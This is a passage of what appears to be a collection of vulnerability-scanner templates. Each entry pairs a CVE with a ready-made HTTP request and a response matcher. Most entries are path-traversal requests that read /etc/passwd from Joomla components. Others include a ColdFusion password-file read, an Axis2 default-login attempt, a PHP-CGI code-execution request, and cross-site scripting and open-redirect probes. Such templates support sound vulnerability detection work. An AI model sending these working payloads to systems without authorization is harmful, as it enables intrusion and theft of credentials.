Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site 